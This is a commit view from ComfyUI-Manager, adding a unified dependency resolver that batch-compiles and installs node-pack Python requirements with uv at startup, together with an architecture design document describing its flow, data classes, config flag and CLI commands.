@staticmethod
def _extract_package_name(spec: str) -> str:
"""Extract normalised package name from a requirement spec."""
name = re.split(r'[><=!~;\[@ ]', spec)[0].strip()
return name.lower().replace('-', '_')
def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str,
                              installed: dict) -> bool:
    """Reproduce the downgrade logic from ``is_blacklisted()``.

    Uses ``manager_util.StrictVersion`` — **not** ``packaging.version``.

    Args:
        pkg_name: Normalised package name.
        pkg_spec: Original requirement spec (may carry a version operator).
        installed: Pre-fetched snapshot from
            ``manager_util.get_installed_packages()``.

    Returns:
        ``True`` when installing *pkg_spec* could downgrade (or needlessly
        reinstall) a protected package.
    """
    if pkg_name not in self.downgrade_blacklist:
        return False
    match = _VERSION_SPEC_PATTERN.search(pkg_spec)
    if match is None:
        # No version spec: prevent reinstall if already installed
        if pkg_name in installed:
            return True
    elif match.group(2) in ('<=', '==', '<', '~='):
        # Only upper-bounding operators can force a downgrade.
        if pkg_name in installed:
            try:
                installed_ver = manager_util.StrictVersion(installed[pkg_name])
                requested_ver = manager_util.StrictVersion(match.group(3))
                if installed_ver >= requested_ver:
                    return True
            except (ValueError, TypeError):
                # Unparseable version string: fail open (allow install).
                logger.warning(
                    "[UnifiedDepResolver] version parse failed: %s", pkg_spec,
                )
                return False
    return False
# ------------------------------------------------------------------
# Helpers — parsing & output
# ------------------------------------------------------------------
@staticmethod
def _parse_conflicts(stderr: str) -> list[str]:
"""Extract conflict descriptions from ``uv pip compile`` stderr."""
conflicts: list[str] = []
for line in stderr.splitlines():
line = line.strip()
if line and ('conflict' in line.lower() or 'error' in line.lower()):
conflicts.append(line)
return conflicts or [stderr.strip()] if stderr.strip() else []
@staticmethod
def _parse_install_output(
result: subprocess.CompletedProcess[str],
) -> tuple[list[str], list[str]]:
"""Parse ``uv pip install`` stdout for installed/skipped packages."""
installed: list[str] = []
skipped_pkgs: list[str] = []
for line in result.stdout.splitlines():
line_lower = line.strip().lower()
if 'installed' in line_lower or 'updated' in line_lower:
installed.append(line.strip())
elif 'already' in line_lower or 'satisfied' in line_lower:
skipped_pkgs.append(line.strip())
return installed, skipped_pkgs
@staticmethod
def _redact_url(url: str) -> str:
"""Mask ``user:pass@`` credentials in URLs."""
return _CREDENTIAL_PATTERN.sub('://****@', url)
# ------------------------------------------------------------------
# Temp-file housekeeping
# ------------------------------------------------------------------
@classmethod
def cleanup_stale_tmp(cls, max_age_seconds: int = 3600) -> None:
"""Remove stale temp directories from previous abnormal terminations."""
tmp_root = tempfile.gettempdir()
now = time.time()
for entry in os.scandir(tmp_root):
if entry.is_dir() and entry.name.startswith(_TMP_PREFIX):
try:
age = now - entry.stat().st_mtime
if age > max_age_seconds:
shutil.rmtree(entry.path, ignore_errors=True)
logger.info(
"[UnifiedDepResolver] cleaned stale tmp: %s", entry.path,
)
except OSError:
pass

View File

@ -843,7 +843,10 @@ class UnifiedManager:
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
return try_install_script(url, repo_path, install_cmd)
else:
if os.path.exists(requirements_path) and not no_deps:
if not no_deps and manager_util.use_unified_resolver:
# Unified mode: skip per-node pip install (deps resolved at startup batch)
logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
elif os.path.exists(requirements_path) and not no_deps:
print("Install: pip packages")
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
lines = manager_util.robust_readlines(requirements_path)
@ -1604,6 +1607,7 @@ def write_config():
config['default'] = {
'git_exe': get_config()['git_exe'],
'use_uv': get_config()['use_uv'],
'use_unified_resolver': get_config()['use_unified_resolver'],
'channel_url': get_config()['channel_url'],
'share_option': get_config()['share_option'],
'bypass_ssl': get_config()['bypass_ssl'],
@ -1642,12 +1646,16 @@ def read_config():
return default_conf[key].lower() == 'true' if key in default_conf else False
manager_util.use_uv = default_conf['use_uv'].lower() == 'true' if 'use_uv' in default_conf else False
# Don't override use_unified_resolver here: prestartup_script.py already reads config
# and sets this flag, then may reset it to False on resolver fallback.
# Re-reading from config would undo the fallback.
manager_util.bypass_ssl = get_bool('bypass_ssl', False)
return {
'http_channel_enabled': get_bool('http_channel_enabled', False),
'git_exe': default_conf.get('git_exe', ''),
'use_uv': get_bool('use_uv', True),
'use_unified_resolver': get_bool('use_unified_resolver', False),
'channel_url': default_conf.get('channel_url', DEFAULT_CHANNEL),
'default_cache_as_channel_url': get_bool('default_cache_as_channel_url', False),
'share_option': default_conf.get('share_option', 'all').lower(),
@ -1668,12 +1676,14 @@ def read_config():
import importlib.util
# temporary disable `uv` on Windows by default (https://github.com/Comfy-Org/ComfyUI-Manager/issues/1969)
manager_util.use_uv = importlib.util.find_spec("uv") is not None and platform.system() != "Windows"
manager_util.use_unified_resolver = False
manager_util.bypass_ssl = False
return {
'http_channel_enabled': False,
'git_exe': '',
'use_uv': manager_util.use_uv,
'use_unified_resolver': False,
'channel_url': DEFAULT_CHANNEL,
'default_cache_as_channel_url': False,
'share_option': 'all',
@ -1871,7 +1881,6 @@ def __win_check_git_pull(path):
def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=False, no_deps=False):
# import ipdb; ipdb.set_trace()
install_script_path = os.path.join(repo_path, "install.py")
requirements_path = os.path.join(repo_path, "requirements.txt")
@ -1879,7 +1888,10 @@ def execute_install_script(url, repo_path, lazy_mode=False, instant_execution=Fa
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
try_install_script(url, repo_path, install_cmd)
else:
if os.path.exists(requirements_path) and not no_deps:
if not no_deps and manager_util.use_unified_resolver:
# Unified mode: skip per-node pip install (deps resolved at startup batch)
logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
elif os.path.exists(requirements_path) and not no_deps:
print("Install: pip packages")
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
with open(requirements_path, "r") as requirements_file:

View File

@ -88,6 +88,11 @@ def read_uv_mode():
if 'use_uv' in default_conf:
manager_util.use_uv = default_conf['use_uv'].lower() == 'true'
def read_unified_resolver_mode():
if 'use_unified_resolver' in default_conf:
manager_util.use_unified_resolver = default_conf['use_unified_resolver'].lower() == 'true'
def check_file_logging():
global enable_file_logging
if 'file_logging' in default_conf and default_conf['file_logging'].lower() == 'false':
@ -96,9 +101,14 @@ def check_file_logging():
read_config()
read_uv_mode()
read_unified_resolver_mode()
security_check.security_check()
check_file_logging()
# Module-level flag set by startup batch resolver when it succeeds.
# Used by execute_lazy_install_script() to skip per-node pip installs.
_unified_resolver_succeeded = False
cm_global.pip_overrides = {}
if os.path.exists(manager_pip_overrides_path):
@ -581,7 +591,8 @@ def execute_lazy_install_script(repo_path, executable):
install_script_path = os.path.join(repo_path, "install.py")
requirements_path = os.path.join(repo_path, "requirements.txt")
if os.path.exists(requirements_path):
if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
# Per-node pip install: only runs if unified resolver is disabled or failed
print(f"Install: pip packages for '{repo_path}'")
lines = manager_util.robust_readlines(requirements_path)
@ -751,6 +762,38 @@ def execute_startup_script():
print("#######################################################################\n")
# --- Unified dependency resolver: batch resolution at startup ---
# Runs unconditionally when enabled, independent of install-scripts.txt existence.
if manager_util.use_unified_resolver:
try:
from .common.unified_dep_resolver import (
UnifiedDepResolver,
UvNotAvailableError,
collect_base_requirements,
collect_node_pack_paths,
)
_resolver = UnifiedDepResolver(
node_pack_paths=collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes')),
base_requirements=collect_base_requirements(comfy_path),
blacklist=set(),
overrides={},
downgrade_blacklist=[],
)
_result = _resolver.resolve_and_install()
if _result.success:
_unified_resolver_succeeded = True
logging.info("[UnifiedDepResolver] startup batch resolution succeeded")
else:
manager_util.use_unified_resolver = False
logging.warning("[UnifiedDepResolver] startup batch failed: %s, falling back to per-node pip", _result.error)
except UvNotAvailableError:
manager_util.use_unified_resolver = False
logging.warning("[UnifiedDepResolver] uv not available at startup, falling back to per-node pip")
except Exception as e:
manager_util.use_unified_resolver = False
logging.warning("[UnifiedDepResolver] startup error: %s, falling back to per-node pip", e)
# Check if script_list_path exists
if os.path.exists(script_list_path):
execute_startup_script()

View File

@ -0,0 +1,812 @@
# Architecture Design: Unified Dependency Resolver
## 1. System Architecture
### 1.1 Module Location
```
comfyui_manager/
├── glob/
│ └── manager_core.py # Existing: execute_install_script() call sites (2 locations)
├── common/
│ ├── manager_util.py # Existing: get_pip_cmd(), PIPFixer, use_uv flag
│ ├── cm_global.py # Existing: pip_overrides, pip_blacklist (runtime dynamic assignment)
│ └── unified_dep_resolver.py # New: Unified dependency resolution module
├── prestartup_script.py # Existing: config reading, remap_pip_package, cm_global initialization
└── legacy/
└── manager_core.py # Legacy (not a modification target)
cm_cli/
└── __main__.py # CLI entry: uv-compile command (on-demand batch resolution)
```
The new module `unified_dep_resolver.py` is added to the `comfyui_manager/common/` directory.
It reuses `manager_util` utilities and `cm_global` global state from the same package.
> **Warning**: `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are
> NOT defined in `cm_global.py`. They are **dynamically assigned** during `prestartup_script.py` execution.
> In v1 unified mode, these are **not applied** — empty values are passed to the resolver constructor.
> The constructor interface accepts them for future extensibility (defaults to empty when `None`).
>
> **[DEFERRED]** Reading actual `cm_global` values at startup is deferred to a future version.
> The startup batch resolver in `prestartup_script.py` currently passes `blacklist=set()`,
> `overrides={}`, `downgrade_blacklist=[]`. The constructor and internal methods
> (`_remap_package`, `_is_downgrade_blacklisted`, blacklist check) are fully implemented
> and will work once real values are provided.
### 1.2 Overall Flow
```mermaid
flowchart TD
subgraph INSTALL_TIME["Install Time (immediate)"]
MC["manager_core.py<br/>execute_install_script() — 2 locations"]
MC -->|"use_unified_resolver=True"| SKIP["Skip per-node pip install<br/>(deps deferred to restart)"]
MC -->|"use_unified_resolver=False"| PIP["Existing pip install loop"]
SKIP --> INST["Run install.py"]
PIP --> INST
end
subgraph STARTUP["ComfyUI Restart (prestartup_script.py)"]
CHK{use_unified_resolver?}
CHK -->|Yes| UDR
CHK -->|No| LAZY["execute_lazy_install_script()<br/>per-node pip install (existing)"]
subgraph UDR["UnifiedDepResolver (batch)"]
S1["1. collect_requirements()<br/>(ALL installed node packs)"]
S2["2. compile_lockfile()"]
S3["3. install_from_lockfile()"]
S1 --> S2 --> S3
end
UDR -->|Success| FIX["PIPFixer.fix_broken()"]
UDR -->|Failure| LAZY
LAZY --> FIX2["PIPFixer.fix_broken()"]
end
```
> **Key design change**: The unified resolver runs at **startup time** (module scope), not at install time.
> At install time, `execute_install_script()` skips the pip loop when unified mode is active.
> At startup, `prestartup_script.py` runs the resolver at module scope — unconditionally when enabled,
> independent of `install-scripts.txt` existence. Blacklist/overrides/downgrade_blacklist are bypassed
> (empty values passed); `uv pip compile` handles all conflict resolution natively.
>
> **Note**: `execute_install_script()` exists in 2 locations in the codebase (excluding legacy module).
> - `UnifiedManager.execute_install_script()` (class method): Used for CNR installs, etc.
> - Standalone function `execute_install_script()`: Used for updates, git installs, etc.
> Both skip per-node pip install when unified mode is active.
### 1.3 uv Command Strategy
**`uv pip compile`** → Generates pinned requirements.txt (pip-compatible)
- Do not confuse with `uv lock`
- `uv lock` generates `uv.lock` (TOML) — cross-platform but incompatible with pip workflows
- This design uses a pip-compatible workflow (`uv pip compile` → `uv pip install -r`)
**`uv pip install -r`** ← Used instead of `uv pip sync`
- `uv pip sync`: **Deletes** packages not in lockfile → Risk of removing torch, ComfyUI deps
- `uv pip install -r`: Only performs additive installs, preserves existing packages → Safe
---
## 2. Class Design
### 2.1 UnifiedDepResolver
```python
class UnifiedDepResolver:
"""
Unified dependency resolver.
Resolves and installs all dependencies of (installed node packs + new node packs)
at once using uv.
Responsibility scope: Dependency resolution and installation only.
install.py execution and PIPFixer calls are handled by the caller (manager_core).
"""
def __init__(
self,
node_pack_paths: list[str],
base_requirements: list[str] | None = None,
blacklist: set[str] | None = None,
overrides: dict[str, str] | None = None,
downgrade_blacklist: list[str] | None = None,
):
"""
Args:
node_pack_paths: List of node pack directory paths
base_requirements: Base dependencies (ComfyUI requirements, etc.)
blacklist: Blacklisted package set (default: empty set; not applied in v1 unified mode)
overrides: Package name remapping dict (default: empty dict; not applied in v1 unified mode)
downgrade_blacklist: Downgrade-prohibited package list (default: empty list; not applied in v1 unified mode)
"""
def resolve_and_install(self) -> ResolveResult:
"""Execute full pipeline: stale cleanup → collect → compile → install.
Calls cleanup_stale_tmp() at start to clean up residual files from previous abnormal terminations."""
def collect_requirements(self) -> CollectedDeps:
"""Collect dependencies from all node packs"""
def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
"""Generate pinned requirements via uv pip compile"""
def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
"""Install from pinned requirements (uv pip install -r)"""
```
### 2.2 Data Classes
```python
@dataclass
class PackageRequirement:
"""Individual package dependency"""
name: str # Package name (normalized)
spec: str # Original spec (e.g., "torch>=2.0")
source: str # Source node pack path
@dataclass
class CollectedDeps:
"""All collected dependencies"""
requirements: list[PackageRequirement] # Collected deps (duplicates allowed, uv resolves)
skipped: list[tuple[str, str]] # (package_name, skip_reason)
sources: dict[str, list[tuple[str, str]]] # {package_name: [(pack_path, pkg_spec), ...]}
"""pkg_name → [(pack_path, pkg_spec), ...] — tracks which node packs request each package."""
extra_index_urls: list[str] # Additional index URLs separated from --index-url entries
@dataclass
class LockfileResult:
"""Compilation result"""
success: bool
lockfile_path: str | None # pinned requirements.txt path
conflicts: list[str] # Conflict details
stderr: str # uv error output
@dataclass
class InstallResult:
"""Installation result (uv pip install -r is atomic: all-or-nothing)"""
success: bool
installed: list[str] # Installed packages (stdout parsing)
skipped: list[str] # Already installed (stdout parsing)
stderr: str # uv stderr output (for failure analysis)
@dataclass
class ResolveResult:
"""Full pipeline result"""
success: bool
collected: CollectedDeps | None
lockfile: LockfileResult | None
install: InstallResult | None
error: str | None
```
---
## 3. Core Logic Details
### 3.1 Dependency Collection (`collect_requirements`)
```python
# Input sanitization: dangerous patterns to reject
_DANGEROUS_PATTERNS = re.compile(
r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
r'|--find-links\b|-f\b|.*@\s*file://)',
re.IGNORECASE
)
def collect_requirements(self) -> CollectedDeps:
requirements = []
skipped = []
sources = defaultdict(list)
extra_index_urls = []
for path in self.node_pack_paths:
# Exclude disabled node packs (directory-based mechanism)
# Disabled node packs are actually moved to custom_nodes/.disabled/,
# so they should already be excluded from input at this point.
# Defensive check: new style (.disabled/ directory) + old style ({name}.disabled suffix)
if ('/.disabled/' in path
or os.path.basename(os.path.dirname(path)) == '.disabled'
or path.rstrip('/').endswith('.disabled')):
continue
req_file = os.path.join(path, "requirements.txt")
if not os.path.exists(req_file):
continue
# chardet-based encoding detection (existing robust_readlines pattern)
for line in self._read_requirements(req_file):
line = line.split('#')[0].strip()
if not line:
continue
# 0. Input sanitization (security)
if self._DANGEROUS_PATTERNS.match(line):
skipped.append((line, f"rejected: dangerous pattern in {path}"))
logging.warning(f"[UnifiedDepResolver] rejected dangerous line: '{line}' from {path}")
continue
# 1. Separate --index-url / --extra-index-url handling
# (BEFORE path separator check, because URLs contain '/')
if '--index-url' in line or '--extra-index-url' in line:
pkg_spec, index_url = self._split_index_url(line)
if index_url:
extra_index_urls.append(index_url)
line = pkg_spec
if not line:
# Standalone option line (no package prefix)
continue
# 1b. Reject path separators in package name portion
pkg_name_part = re.split(r'[><=!~;]', line)[0]
if '/' in pkg_name_part or '\\' in pkg_name_part:
                skipped.append((line, "rejected: path separator in package name"))
continue
# 2. Apply remap_pip_package (using cm_global.pip_overrides)
pkg_spec = self._remap_package(line)
# 3. Blacklist check (cm_global.pip_blacklist)
pkg_name = self._extract_package_name(pkg_spec)
if pkg_name in self.blacklist:
skipped.append((pkg_spec, "blacklisted"))
continue
# 4. Downgrade blacklist check (includes version comparison)
if self._is_downgrade_blacklisted(pkg_name, pkg_spec):
skipped.append((pkg_spec, "downgrade blacklisted"))
continue
# 5. Collect (no dedup — uv handles resolution)
req = PackageRequirement(
name=pkg_name,
spec=pkg_spec,
source=path,
)
requirements.append(req)
sources[pkg_name].append((path, pkg_spec))
return CollectedDeps(
requirements=requirements,
skipped=skipped,
sources=dict(sources),
extra_index_urls=list(set(extra_index_urls)), # Deduplicate
)
def _split_index_url(self, line: str) -> tuple[str, str | None]:
"""Split 'package_name --index-url URL' → (package_name, URL).
Also handles standalone ``--index-url URL`` and
``--extra-index-url URL`` lines (with no package prefix).
"""
# Handle --extra-index-url first (contains '-index-url' as substring
# but NOT '--index-url' due to the extra-index prefix)
for option in ('--extra-index-url', '--index-url'):
if option in line:
parts = line.split(option, 1)
pkg_spec = parts[0].strip()
url = parts[1].strip() if len(parts) == 2 else None
return pkg_spec, url
return line, None
def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str) -> bool:
"""Reproduce the downgrade version comparison from existing is_blacklisted() logic.
Same logic as manager_core.py's is_blacklisted():
- No version spec and already installed → block (prevent reinstall)
- Operator is one of ['<=', '==', '<', '~='] and
installed version >= requested version → block (prevent downgrade)
- Version comparison uses manager_util.StrictVersion (NOT packaging.version)
"""
if pkg_name not in self.downgrade_blacklist:
return False
installed_packages = manager_util.get_installed_packages()
# Version spec parsing (same pattern as existing is_blacklisted())
pattern = r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
match = re.search(pattern, pkg_spec)
if match is None:
# No version spec: prevent reinstall if already installed
if pkg_name in installed_packages:
return True
elif match.group(2) in ['<=', '==', '<', '~=']:
# Downgrade operator: block if installed version >= requested version
if pkg_name in installed_packages:
try:
installed_ver = manager_util.StrictVersion(installed_packages[pkg_name])
requested_ver = manager_util.StrictVersion(match.group(3))
if installed_ver >= requested_ver:
return True
except (ValueError, TypeError):
logging.warning(f"[UnifiedDepResolver] version parse failed: {pkg_spec}")
return False
return False
def _remap_package(self, pkg: str) -> str:
"""Package name remapping based on cm_global.pip_overrides.
Reuses existing remap_pip_package() logic."""
if pkg in self.overrides:
remapped = self.overrides[pkg]
logging.info(f"[UnifiedDepResolver] '{pkg}' remapped to '{remapped}'")
return remapped
return pkg
```
### 3.2 Lockfile Generation (`compile_lockfile`)
**Behavior:**
1. Create a unique temp directory (`tempfile.mkdtemp(prefix="comfyui_resolver_")`) for concurrency safety
2. Write collected requirements and base constraints to temp files
3. Execute `uv pip compile` with options:
- `--output-file` (pinned requirements path within temp dir)
- `--python` (current interpreter)
- `--constraint` (base dependencies)
- `--extra-index-url` (from `CollectedDeps.extra_index_urls`, logged via `_redact_url()`)
4. Timeout: 300s — returns `LockfileResult(success=False)` on `TimeoutExpired`
5. On `returncode != 0`: parse stderr for conflict details via `_parse_conflicts()`
6. Post-success verification: confirm lockfile was actually created (handles edge case of `returncode==0` without output)
7. Temp directory cleanup: `shutil.rmtree()` in `except` block; on success, caller (`resolve_and_install`'s `finally`) handles cleanup
### 3.3 Dependency Installation (`install_from_lockfile`)
**Behavior:**
1. Execute `uv pip install --requirement <lockfile_path> --python <sys.executable>`
- **NOT `uv pip sync`** — sync deletes packages not in lockfile (dangerous for torch, ComfyUI deps)
2. `uv pip install -r` is **atomic** (all-or-nothing): no partial failure
3. Timeout: 600s — returns `InstallResult(success=False)` on `TimeoutExpired`
4. On success: parse stdout via `_parse_install_output()` to populate `installed`/`skipped` lists
5. On failure: `stderr` captures the failure cause; `installed=[]` (atomic model)
### 3.4 uv Command Resolution
**`_get_uv_cmd()` resolution order** (mirrors existing `get_pip_cmd()` pattern):
1. **Module uv**: `[sys.executable, '-m', 'uv']` (with `-s` flag for embedded Python — note: `python_embeded` spelling is intentional, matching ComfyUI Windows distribution path)
2. **Standalone uv**: `['uv']` via `shutil.which('uv')`
3. **Not found**: raises `UvNotAvailableError` → caught by caller for pip fallback
### 3.5 Stale Temp File Cleanup
**`cleanup_stale_tmp(max_age_seconds=3600)`** — classmethod, called at start of `resolve_and_install()`:
- Scans `tempfile.gettempdir()` for directories with prefix `comfyui_resolver_`
- Deletes directories older than `max_age_seconds` (default: 1 hour)
- Silently ignores `OSError` (permission issues, etc.)
### 3.6 Credential Redaction
```python
_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
def _redact_url(self, url: str) -> str:
"""Mask authentication info in URLs. user:pass@host → ****@host"""
return self._CREDENTIAL_PATTERN.sub('://****@', url)
```
All `--extra-index-url` logging passes through `_redact_url()`:
```python
# Logging example within compile_lockfile()
for url in deps.extra_index_urls:
logging.info(f"[UnifiedDepResolver] extra-index-url: {self._redact_url(url)}")
cmd += ["--extra-index-url", url] # Original URL passed to actual command
```
---
## 4. Existing Code Integration
### 4.1 manager_core.py Modification Points
**2 `execute_install_script()` locations — both skip deps in unified mode:**
#### 4.1.1 UnifiedManager.execute_install_script() (Class Method)
#### 4.1.2 Standalone Function execute_install_script()
**Both locations use the same pattern when unified mode is active:**
1. `lazy_mode=True` → schedule and return early (unchanged)
2. If `not no_deps and manager_util.use_unified_resolver`:
- **Skip** the `requirements.txt` pip install loop entirely (deps deferred to startup)
- Log: `"[UnifiedDepResolver] deps deferred to startup batch resolution"`
3. If `not manager_util.use_unified_resolver`: existing pip install loop runs (unchanged)
4. `install.py` execution: **always runs immediately** regardless of resolver mode
> **Parameter ordering differs:**
> - Method: `(self, url, repo_path, instant_execution, lazy_mode, no_deps)`
> - Standalone: `(url, repo_path, lazy_mode, instant_execution, no_deps)`
### 4.1.3 Startup Batch Resolver (`prestartup_script.py`)
**New**: Runs unified resolver at **module scope** — unconditionally when enabled, independent of `install-scripts.txt` existence.
**Execution point**: After config reading and `cm_global` initialization, **before** the `execute_startup_script()` gate.
**Logic** (uses module-level helpers from `unified_dep_resolver.py`):
1. `collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes'))` — enumerate all installed node pack directories
2. `collect_base_requirements(comfy_path)` — read `requirements.txt` + `manager_requirements.txt` from ComfyUI root (base deps only)
3. Create `UnifiedDepResolver` with **empty** blacklist/overrides/downgrade_blacklist (uv handles resolution natively; interface preserved for extensibility)
4. Call `resolve_and_install()` → on success set `_unified_resolver_succeeded = True`
5. On failure (including `UvNotAvailableError`): log warning, fall back to per-node pip
> `manager_requirements.txt` is read **only** from `comfy_path` (ComfyUI base), never from node packs.
> Node packs' `requirements.txt` are collected by the resolver's `collect_requirements()` method.
### 4.1.5 `execute_lazy_install_script()` Modification
When unified resolver **succeeds**, `execute_lazy_install_script()` skips the per-node pip install loop
(deps already batch-resolved at module scope). `install.py` still runs per node pack.
```python
# In execute_lazy_install_script():
if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
# Per-node pip install: only runs if unified resolver is disabled or failed
...
# install.py always runs regardless
```
> **Note**: Gated on `_unified_resolver_succeeded` (success flag), NOT `use_unified_resolver` (enable flag).
> If the resolver is enabled but fails, `_unified_resolver_succeeded` remains False → per-node pip runs as fallback.
### 4.1.6 CLI Integration
Multiple entry points expose the unified resolver in `cm_cli`:
#### 4.1.6.1 Standalone Command: `cm_cli uv-compile`
On-demand batch resolution — independent of ComfyUI startup.
```bash
cm_cli uv-compile [--user-directory DIR]
```
Resolves all installed node packs' dependencies at once. Useful for environment
recovery or initial setup without starting ComfyUI.
`PIPFixer.fix_broken()` runs after resolution (via `finally` — runs on both success and failure).
#### 4.1.6.2 Install Flag: `cm_cli install --uv-compile`
```bash
cm_cli install <node1> [node2 ...] --uv-compile [--mode remote]
```
When `--uv-compile` is set:
1. `no_deps` is forced to `True` → per-node pip install is skipped during each node installation
2. After **all** nodes are installed, runs unified batch resolution over **all installed node packs**
(not just the newly installed ones — `uv pip compile` needs the complete dependency graph)
3. `PIPFixer.fix_broken()` runs after resolution (via `finally` — runs on both success and failure)
This differs from per-node pip install: instead of resolving each node pack's
`requirements.txt` independently, all deps are compiled together to avoid conflicts.
#### 4.1.6.3 Additional `--uv-compile` Commands
The following commands follow the same `no_deps` + batch-resolve pattern as `install --uv-compile`:
`cmd_ctx.set_no_deps(True)` is set before node operations, then `_run_unified_resolve()`
runs at the end via `try/finally` with `PIPFixer.fix_broken()`.
| Command | Operation |
|---------|-----------|
| `cm_cli reinstall --uv-compile` | Reinstall nodes then batch-resolve |
| `cm_cli update --uv-compile` | Update nodes then batch-resolve |
| `cm_cli fix --uv-compile` | Fix node dependencies then batch-resolve |
| `cm_cli restore-snapshot --uv-compile` | Restore snapshot then batch-resolve |
| `cm_cli restore-dependencies --uv-compile` | Restore all node deps then batch-resolve |
| `cm_cli install-deps <deps.json> --uv-compile` | Install from deps spec file then batch-resolve |
> **`reinstall` only**: Has `--uv-compile` / `--no-deps` mutual exclusion check.
> Both skip per-node pip, but `--no-deps` skips permanently while `--uv-compile` also
> triggers batch resolution after all nodes are processed.
>
> **`restore-snapshot` only**: Has an additional pre-resolution exception guard — if the
> snapshot restore itself fails (before `_run_unified_resolve()` is reached),
> `PIPFixer.fix_broken()` runs in the exception handler before exit. The `try/finally`
> applies to the `_run_unified_resolve()` call. See dec_7 for rationale.
#### Shared Design Decisions
- **Uses real `cm_global` values**: Unlike the startup path (4.1.3) which passes empty
blacklist/overrides, CLI commands pass `cm_global.pip_blacklist`,
`cm_global.pip_overrides`, and `cm_global.pip_downgrade_blacklist` — already
initialized at `cm_cli/__main__.py` module scope.
- **No `_unified_resolver_succeeded` flag**: Not needed — these are one-shot commands,
not startup gates.
- **Shared helper**: All entry points delegate to `_run_unified_resolve()` which
handles resolver instantiation, execution, and result reporting.
- **Error handling**: `UvNotAvailableError` / `ImportError` → exit 1 with message.
All entry points guarantee `PIPFixer.fix_broken()` runs regardless of outcome —
via `try/finally` around `_run_unified_resolve()`. `restore-snapshot` additionally
calls `fix_broken()` in the snapshot restore exception handler (before
`_run_unified_resolve()` is reached), per dec_7.
- **Conflict attribution output**: When resolution fails and `result.lockfile.conflicts`
is non-empty, `_run_unified_resolve()` cross-references conflict package names with
`CollectedDeps.sources` to identify which node packs requested each conflicting package:
- Normalization: both sources keys and conflict text apply `.lower().replace("-", "_")`
- Word-boundary regex `(?<![a-z0-9_])pkg(?![a-z0-9_])` prevents false-positive prefix
matches (e.g., `torch` does NOT match `torch_audio` or `torchvision`)
- Output format: sorted by package name, each entry lists `pack_basename → pkg_spec`
per requester (using `CollectedDeps.sources` tuple values `(pack_path, pkg_spec)`)
**Node pack discovery**: Uses `cmd_ctx.get_custom_nodes_paths()``collect_node_pack_paths()`,
which is the CLI-native path resolution (respects `--user-directory` and `folder_paths`).
### 4.2 Configuration Addition (config.ini)
```ini
[default]
# Existing settings...
use_unified_resolver = false # Enable unified dependency resolution
```
### 4.3 Configuration Reading
Follows the existing `read_uv_mode()` / `use_uv` pattern:
- `prestartup_script.py`: `read_unified_resolver_mode()` reads from `default_conf` → sets `manager_util.use_unified_resolver`
- `manager_core.py`: `read_config()` / `write_config()` / `get_config()` include `use_unified_resolver` key
- `read_config()` exception fallback must include `use_unified_resolver` key to prevent `KeyError` in `write_config()`
### 4.4 manager_util.py Extension
```python
# manager_util.py
use_unified_resolver = False # New global flag (separate from use_uv)
```
---
## 5. Error Handling Strategy
```mermaid
flowchart TD
STARTUP["prestartup_script.py startup"]
STARTUP --> CHK{use_unified_resolver?}
CHK -->|No| SKIP_UDR["Skip → execute_lazy_install_script per-node pip"]
CHK -->|Yes| RAI["run_unified_resolver()"]
RAI --> STALE["cleanup_stale_tmp()<br/>Clean stale temp dirs (>1 hour old)"]
STALE --> UV_CHK{uv installed?}
UV_CHK -->|No| UV_ERR["UvNotAvailableError<br/>→ Fallback: execute_lazy_install_script per-node pip"]
UV_CHK -->|Yes| CR["collect_requirements()<br/>(ALL installed node packs)"]
CR --> CR_DIS[".disabled/ path → auto-skip"]
CR --> CR_PARSE["Parse failure → skip node pack, continue"]
CR --> CR_ENC["Encoding detection failure → assume UTF-8"]
CR --> CR_DANGER["Dangerous pattern detected → reject line + log"]
CR --> CR_DG["Downgrade blacklist → skip after version comparison"]
CR --> CL["compile_lockfile()"]
CL --> CL_CONFLICT["Conflict → report + per-node pip fallback"]
CL --> CL_TIMEOUT["TimeoutExpired 300s → per-node pip fallback"]
CL --> CL_NOFILE["Lockfile not created → failure + fallback"]
CL --> CL_TMP["Temp directory → finally block cleanup"]
CL -->|Success| IL["install_from_lockfile()"]
IL --> IL_OK["Total success → parse installed/skipped"]
IL --> IL_FAIL["Total failure → stderr + per-node pip fallback (atomic)"]
IL --> IL_TIMEOUT["TimeoutExpired 600s → fallback"]
IL_OK --> PF["PIPFixer.fix_broken()<br/>Restore torch/opencv/frontend"]
PF --> LAZY["execute_lazy_install_script()<br/>(install.py only, deps skipped)"]
```
> **Fallback model**: On resolver failure at startup, `execute_lazy_install_script()` runs normally
> (per-node pip install), providing the same behavior as if unified mode were disabled.
---
## 6. File Structure
### 6.1 New Files
```
comfyui_manager/common/unified_dep_resolver.py # Main module (~350 lines, includes sanitization/downgrade logic)
tests/test_unified_dep_resolver.py # Unit tests
```
### 6.2 Modified Files
```
comfyui_manager/glob/manager_core.py # Skip per-node pip in unified mode (2 execute_install_script locations)
comfyui_manager/common/manager_util.py # Add use_unified_resolver flag
comfyui_manager/prestartup_script.py # Config reading + startup batch resolver + execute_lazy_install_script modification
```
> **Not modified**: `comfyui_manager/legacy/manager_core.py` (legacy paths retain existing pip behavior)
---
## 7. Dependencies
| Dependency | Purpose | Notes |
|-----------|---------|-------|
| `uv` | Dependency resolution and installation | Already included in project dependencies |
| `cm_global` | pip_overrides, pip_blacklist, pip_downgrade_blacklist | Reuse existing global state (runtime dynamic assignment) |
| `manager_util` | StrictVersion, get_installed_packages, use_unified_resolver flag | Reuse existing utilities |
| `tempfile` | Temporary requirements files, mkdtemp | Standard library |
